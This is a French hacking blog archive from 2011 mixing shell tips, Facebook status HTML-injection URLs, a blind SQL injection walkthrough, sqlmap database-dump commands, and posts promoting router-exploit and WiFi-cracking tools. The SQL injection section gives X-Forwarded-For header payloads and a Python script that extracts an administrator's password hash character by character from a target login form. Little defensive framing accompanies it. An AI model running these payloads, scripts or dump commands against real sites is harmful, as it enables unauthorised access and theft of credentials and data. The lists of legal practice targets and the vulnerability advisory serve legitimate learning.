mercredi 24 août 2011

Le SHELL pour les nuls, des scripts bash faciles, et les man en français





Bash-linux a été créé pour tous les nouveaux ''administrateurs''qui commencent à devoir toucher à de la programmation Shell sans avoir jamais eu de formation informatique pour : pour votre premier serveur dédié sous système UNIX (RedHat, Debian...), ou même votre hébergement mutualisé OVH par exemple :-)

Ici, on va pas vous apprendre à faire du SHELL en vous disant ce genre de choses, on va directement vous fournir la ligne de code.
Genre ''Vous voulez faire ça, tapez ça''. Simple, rapide, et quand on est sur un problème précis, et qu'on a pas le temps d'aller fouiller les 40.000 pages de la doc, ça fait gagner du temps

Un second niveau vous permet de comprendre ce que vous faites, ce qui entre nous reste quand même un minimum. On vous fourni la ligne de vos rêves, mais on vous l'explique. Si vous voulez apprendre et comprendre, lisez l'explication, sinon copiez-collez simplement la ligne de commande dans votre Putty.

lundi 22 août 2011

Changer la source ("VIA") de vos statuts facebook

http://statut.dev-tunisie.com
Voici une astuce assez fun pour surprendre vos amis .
En effet certain publient leur statut depuis Android ou I phone , résultat en dessous de statut vous verrez d'écrit "VIA android" ou "VIA I phone" et bien voici un site  qui permet de mettre une autre source de statut VIA :
k@dhem virus
Skynet
Telegram
Carrier Pigeon
Morse Code
Message in a Bottle
Commodore 64
Your moms computer
iPod Nano 

ect... 
étape 1 =
Etape 2 


























Etape 3 



Résultat =))) 




TN-Security: Mettre a jour son statut facebook avec du code XFBML et HTML

TN-Security: Mettre a jour son statut facebook avec du code XFBML et HTML

Mettre a jour son statut facebook avec du code XFBML et HTML


La semaine dernière on  a trouvé le moyen d’injecter du code HTML dans les statuts Facebook !!!!
Pour permettre cela il faut injecter le code via l’url suivante:
On copie et on colle le code suivant dans la barre d’adresse du navigateur et on clique sur partager pour que le statut s’affiche sur son profil.
Exemple:
Live Stream:
Code:
https://www.facebook.com/connect/prompt_feed.php?display=touch&api_key=101148623323573&%2Fq3EzkPR&attachment={%27description%27%3A%27%3Cfb%3Alive-stream+event_app_id%3D%22101148623323573%22%20+width%3D%22400%22+height%3D%22500%22+xid%3D%22%22+via_url%3D%22http://www.tn-security.blogspot.com%22+always_post_to_friends%3D%22false%22%3E%3C%2Ffb%3Alive-stream%3E+%27}


Pour injecter du code HTML la méthode est similaire il faut passer par ce lien:
Puis cliquer sur partager.
Exemple:


Code:
https://www.facebook.com/dialog/feed?app_id=101148623323573&redirect_uri=https%3A%2F%2Fwww..facebook.com&message&link=http://tn-security.blogspot.com&name=%3Ccenter%3E%3Cbutton%3E+==>+(+===>Tn+Security<====+)%3C%2Fbutton%3E%3C%2Fcenter%3E



Vous pouvez bien sur modifier les paramètres comme bon vous semble pour par exemple faire pointer le lien vers votre site.
Exemple : 
Code:

https://www.facebook.com/dialog/feed?app_id=101148623323573&redirect_uri=https%3A%2F%2Fwww..facebook.com&message&link=https://www.facebook.com/mvaryes%2F&name=%3Ccenter%3E%3Cbutton%3E+Visit+(+===%3Ekadhem+virus%3C====+)%3C%2Fbutton%3E%3C%2Fcenter%3E





samedi 20 août 2011

Blind SQL injection via un header HTTP


Cet article présente une façon originale d’exploiter une faille de type injection SQL. La faille ce trouve dans un formulaire d’identification et plus précisément dans le code PHP qui ne contrôle pas tous les paramètres de la requête SQL.Le code PHP est le suivant :
$req = mysql_query("SELECT login,pwd FROM administrators WHERE login='".sanitize($_POST['login'])."' AND pwd='".md5($_POST['password'])."' AND ip='".ip()."'");
La variable login est correctement contrôlée grâce à la fonction sanitize :
function sanitize($param){
	if (is_numeric($param))
	{
		return $param;
	}
	else
	{
		return mysql_real_escape_string($param);
	}
}
Et le mot de pass est directement converti en MD5, rien à faire de ce coté là. Intéressons nous au paramète « IP » et plus particulièrement à la fonction ip().
function ip()
{
    if (isset($_SERVER['HTTP_X_FORWARDED_FOR']))
	{
		$ip = $_SERVER['HTTP_X_FORWARDED_FOR'];
    }
	else
	{
		$ip = $_SERVER["REMOTE_ADDR"];
    }
 
	if (preg_match("#^[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}#",$ip))
	{
		return $ip;
	}
	else
	{
		return $_SERVER["REMOTE_ADDR"];
	}
}
On remarque que la récupération de l’adresse ip repose sur un header HTTP (X_FORWARDED_FOR) et que le seul contrôle effectué est un preg_match qui permet de vérifier que le paramètre contient bien au moins une adresse ip. Il est alors possible d’injecter du code SQL dans le header HTTP afin de bypasser l’identification voir même d’extraire les informations de la BDD.
En modifiant le header par :
127.0.0.1' or 1=1#
La requête est forcément vrai et on se retrouve identifié o/
De la même manière on va pouvoir récupérer le password de l’administrateur, en effet lorsque la requete est fausse la page affiche « Mot de passe incorrect », en effectuant une blind SQL injection il est possible de retrouver le mot de passe caractère par caractère, exemple :
127.0.0.1' or ascii(substring(pwd,1,1))=48#
Si le requete est vrai et donc que l’on se retrouve identifié alors cela veut dire que le premier caractère du mot de passe est « 0″ (48 en ascii)
J’ai écrit un petit script en python (mon premier) qui permet d’automatiser tout cela  :
import httplib
import urllib
import re
 
password = ""
 
md5 = ['0','1','2','3','4','5','6','7','8','9','a','b','c','d','e','f']
cpt = 0
i = 1
 
while i<=32:
 
	print 'Recherche du caractère '+str(i)
	if cpt == 16:
		cpt = 0
 
	print 'Test caractere : '+md5[cpt]
	params = urllib.urlencpt({'login': 'admin', 'pwd': 'password'})
	headers = {"Content-type": "application/x-www-form-urlencptd","Accept": "text/plain","x-forwarded-for":"127.0.0.1' or ascii(substring(pwd,"+str(i)+",1))="+str(ord(md5[cpt]))+"#"}
	conn = httplib.HTTPConnection("www.site.com:80")
	conn.request("POST", "/index.php", params, headers)
	response = conn.getresponse()
	print response.status, response.reason
	data = response.read()
	conn.close()
 
	if not(re.search('incorrect',data)):
		print 'Caractère trouvé : '+md5[cpt]
		password += md5[cpt]
		i += 1
		cpt = 0
	else:
		cpt += 1
 
print 'MD5 = '+str(password)
Et voila on trouve le hash et un passage par ici ou par  nous donne la correspondance. Si vous avez des questions, commentaires n’hésitez pas.

Routerpwn une application pour pirater les routeurs


Routerpwn est une application web qui va vous permettre d’exploiter les vulnérabilités de votre routeur depuis votre ordinateur ou votre smartphone.
Routerpwn.com compile les failles connues des différents routeurs sous la forme d’une simple page HTML et de Javascript. D’un simple clique vous pourrez exploiter des failles sur 12 marques de routeurs connus (Belkin, Cisco, D-Link, Motorola, Siemens, Thomson).
De plus Routerpwn permet via plusieurs liens de retrouver un vendeur à partir d’une adresse mac, de savoir le mot de passe par défaut d’un routeur, de connaitre la clé WEP en fonction de l’adresse MAC ( on peut faire la même chose avec certain modèles de Bbox avec l’essid).
Ce qui est intéressant c’est que comme tout est basé sur du JavaScript il est possible de sauvegarder la page et d’utiliser les exploits sans avoir accès à internet, de plus il est possible d’utiliser Routerpwn depuis n’importe quel appareil ayant accès au net et supportant javascript (blackberry, iphone, ipad …).
bb3 300x225 Routerpwn une application pour pirater les routeursiphone1 200x300 Routerpwn une application pour pirater les routeurs
A l’heure actuelle le site recense 83 exploits dont 2 générateurs.

#!/9 applications pour tester SQLMap et vos talents de Hacker.


SQL map est un outil open source codé principalement en python qui permet d’effectuer de manière automatisé des injections SQL afin d’accédé aux bases de données et récupérer des données sensibles tel que les adresses mails, les mots de passe etc. SQLMap supporte la majeur partie des systèmes de gestion de base de données tel que :
  • MySQL, Oracle,
  • PostgreSQL,
  • Microsoft SQL Server,
  • Microsoft Access
xkcd bobby tables 9 applications pour tester SQLMap et vos talents de Hacker.
SQLMap possède un moteur de détection intégré, la gestion des sessions, la possibilité d’uploader des shells voir même de prendre le contrôle total de l’ordinateur cible en parallèle avec l’utilisation de Metasploit.
Le plus dur quand on veut tester un outil tel que celui là c’est de trouver des sites sur lesquels s’essayer sans risquer de voir débarquer les amis du petit déjeuner le jour suivant devant sa porte. C’est pourquoi je vous ai fait une petite liste d’applications qui vous permettront de vous amuser tout en restant dans la légalité.
  1. Multidae est une application web vulnérable aux top 10 des vulnérabilités de l’OWASP, c’est à dire aux dix risques de sécurité applicatifs web les plus critiques. Sans grande surprise ce sont les failles de type injection (SQL, OS, et LDAP injection) qui arrivent en tête. On retrouve différents point d’attaque dans cette application, chacun permettant d’accéder à la totalité de la base de données.
  2. Acunetix est une société qui développe un scanner de vulnérabilité web, elle propose elle aussi trois applications web afin d’effectuer du pentest légalement :
  3. IBM possède une application vulnérable à l’adresse suivante : http://demo.testfire.net/
  4. SPI Dynamics possède une application vulnérable à l’adresse suivante : http://zero.webappsecurity.com/
  5. NT OBJECTives possède une application vulnérable à l’adresse suivante :http://www.webscantest.com/
  6. Cenzic possède une application vulnérable à l’adresse suivante :http://crackme.cenzic.com/
  7. L’OWASP possède sa propre application vulnérable ici, des consignes pour l’installation ici et les solutions sont disponible 
SQLMap est téléchargeable à l’adresse suivante : Download et peut tourner aussi bien sur Linux que sur Windows. La documentation est disponible aussi bien en HTML qu’en PDF.

vendredi 19 août 2011

Adobe Flash Player et Adobe Air : correction de multiples vulnérabilités

Des vulnérabilités ont été corrigées dans les versions actuelles d’Adobe Flash Player pour les systèmes d’exploitation Windows, Linux et Solaris et Android, ainsi que dans les versions actuelles de Adobe Air pour Windows, Macintosh et Android.



- pour les utilisateurs de Adobe Flash Player pour Windows, Linux et Solaris : il est vivement recommandé d’installer sans délai la dernière version 10.3.183.5 en la téléchargeant depuis le Centre de téléchargement de Adobe Flash Player ;
- pour les utilisateurs de Adobe Flash Player pour Android : il est vivement recommandé d’installer sans délai la dernière version 10.3.186.3 téléchargeable sur Android Market ;
- pour les utilisateurs de Adobe AIR pour Windows, Macintosh et Android : il est vivement recommandé d’installer sans délai la dernière version 2.7.1 téléchargeable sur internet et Android Market.

Les versions vulnérables :

- Adobe Flash Player versions 10.3.181.36 et antérieures pour Windows, Linux et Solaris ;
- Adobe Flash-Player versions 10.3.185.25 et antérieures pour Android ;
- Adobe AIR 2.7 et antérieures pour Windows, Macintosh et Android.

Descriptif des vulnérabilités :

Ces vulnérabilités sont susceptibles de provoquer un dysfonctionnement du logiciel ou de permettre à une personne malveillante de prendre le contrôle de l’ordinateur à distance et à l’insu de son utilisateur.

Pour plus d’informations :

- Bulletin de sécurité Adobe APSB11-21 (9 août 2011) (en anglais) ;
- CERTA-2011-AVI-448 Multiples vulnérabilités dans Adobe Flash Player.

L'outil pour la Google Hacking Database



Le Google Hack DB Tool : est une base de données avec près de 8.000 entrées. Elle permets aux administrateurs de vérifier leur site pour les vulnérabilités basées sur des données stockées dans Google. Avec cet outil, vous pouvez savoir si votre site est indexé dans les vulnérabilités sur Google.

Cela peut conduire à la divulgation d'informations sensibles. De cette façon, vous pouvez savoir ce que Google sait sur vous. 7974 entrées, dont 4203 pour de l'injection SQL.




Grâce à cet outil vous pouvez :
  • Trouvez les informations divulguées,
  • Rechercher des fichiers sensibles,
  • Trouver des répertoires sensibles,
  • Trouver des logiciels vulnérables,
  • Trouver des renseignements personnels.
Cet outil est vraiment rapide et aidera à éliminer la plupart des vulnérabilités connues.
[#/Téléchargement] 

#!/Comment cracker un réseau wifi wep ou wpa en utilisant Aircrack et backtrack



Cette vidéo vous montre comment avoir une clé WEP d'un réseau WIFI avec le programme " AIRCRACK-NG". il faut juste télécharger la version récente de "BACKTRACK."







install backtrack-5 virtuel machine



Injection SQL avec BackTrack 5.





python sqlmap.py -u LE-SITE
python sqlmap.py -u LE-SITE --dbs
python sqlmap.py -u LE-SITE -D DATABASE --tables
python sqlmap.py -u LE-SITE -D DATABASE -T TABLES --columns
python sqlmap.py -u LE-SITE -D DATABASE -T TABLES -C COLONNE--dump

Backtrack 5 R1 est disponible



Correction de 120 bugs, ajout de 30 nouveaux outils. 70 outils ont été mis à jour, le kernel quant à lui passe en 2.6.39.4. [source ]
Salut les geeks,
Nous vous avions déjà parlé brièvement de la sortie de BackTrack 4 dans un article précédent sur Place4geek,
Aujourd’hui c’est au tour de Backtrack 5 : nom de code Révolution de voir le jour (rien avoir avec la Freebox hein).
Un peu d’histoire :
Pour ceux qui ne sauraient pas ce qu’est Backtrack, c’est une distribution Linux basée sur du Debian, qui et est née d’une fusion entre Whax et Auditor. Le but de cette distribution est de fournir un grand nombre d’outils nécessaires aux tests de sécurité d’un réseau. Backtrack regroupe ainsi de nombreux outils très puissants et cette distribution est très utilisés par les pirates en informatique. D’ailleurs elle est rendue célèbre pour ses outils de cracking de réseaux wifi. Si vous voulez plus d’info en général sur Backtrack rendez-vous sur Wikipedia. 
Les nouveautés de BackTrack 5 :
La nouvelle version de BackTrack propose :
  • Une petite mise à jour de l’environnement : KDE 4.6 et Gnome 2.6
  • Support du 32 bits et 64 bits
  • Possibilité de chrooter une image ARM sur un Android
  • Un mode “Forensics Mode” où vos disques dur et swap ne seront pas montés.
  • Un mode “Stealth mode” sans génération de trafic réseau.
  • Metasploit  4.7.0

    Bref pour télécharger l’ISO de Backtrack 5 c’est par ici : Télécharger BackTrack 5 – Revolution.